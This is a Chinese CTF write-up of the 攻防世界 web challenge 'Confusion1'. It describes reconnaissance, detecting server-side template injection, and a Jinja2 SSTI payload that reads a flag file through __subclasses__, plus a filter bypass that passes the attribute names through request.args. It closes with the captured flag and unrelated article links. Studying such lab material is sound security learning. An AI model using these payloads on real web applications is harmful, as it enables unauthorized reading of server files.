#|【攻防世界WEB】难度四星12分进阶题（Confusion1） web安全|php|安全|攻防世界WEB

三、Confusion1

文章图片

解题方法： 1、SSTI漏洞，构造payload

过程：

文章图片

大象and蛇（确实帅）
php+python想到了见过很多次的SSTI漏洞

文章图片

文章图片

先到处逛逛（这个里面都是一些信息）

文章图片

login和register都报错
（但是这里一定是很重要的地方）

文章图片

看robot.txt（没什么东西）

文章图片

考虑分析页面源码了
login.php中Ctrl+U查看页面源码
发现flag路径

文章图片

分析有没有SSTI漏洞
{{1+2}}
被运算了，得出结果3

文章图片

SSTI常用的注入
【#|【攻防世界WEB】难度四星12分进阶题（Confusion1）】__class__() 返回对象的类
__base__()/__mro__() 返回类所继承的基类
__subclasses__() 返回继承类的所有子类
pyaload：
{{"".__class__.__mro__[2].__subclasses__()[40]("/opt/flag_1de36dff62a3a54ecfbc6e1fd2ef0ad1.txt").read()}}
被过滤了

文章图片

构造payload
request 是 Flask 框架的一个全局对象 , 表示 " 当前请求的对象( flask.request ) "
request.args.key
args是参数，key可以是内置函数
——————
payload：
{{''[request.args.a][request.args.b][2][request.args.c]()[40]('/opt/flag_1de36dff62a3a54ecfbc6e1fd2ef0ad1.txt')[request.args.d]()}}?&a=__class__&b=__mro__&c=__subclasses__&d=read

文章图片

cyberpeace{a92d9e29b89ab062c895ddc06f237cb6}

#|【攻防世界WEB】难度四星12分进阶题（Confusion1）

推荐阅读

刘德华刷屏热搜，我只觉得悲哀！

招商银行app转账记录怎么删除

吐司可以怎么吃夏天吐司要放冰箱冷藏吗

壁挂炉关掉暖气只留热水怎么操作,这是非常重要的指数

如何清理笔记本电脑灰尘怎么清理笔记本电脑灰尘

手工消防车怎么做

恭贺新春|恭贺新春 | 汉字到底有多少字（）

环保板材有哪些等级

原车漆可以保持几年原车漆可以保持几年不变色

迷你世界秋果激活码迷你世界秋果兑换码

女人越贵,越有底气,你们赞同吗？

windows查看本机端口我来分享win8系统查看本机端口的基础操作

新生儿黄疸多久消退

北极熊为何不吃企鹅北极熊不吃企鹅

比熊养殖技术比熊养殖技巧

门店财务分析,杜邦财务分析

原神什么时候升暴击原神暴击提升时机分析

武装突袭3怎么在地图上看自己武装突袭怎么看自己位置

2023海南热带野生动植物园赏花时间海南热带野生动植物园本地人门票

万寿果泡酒的功效与作用有哪些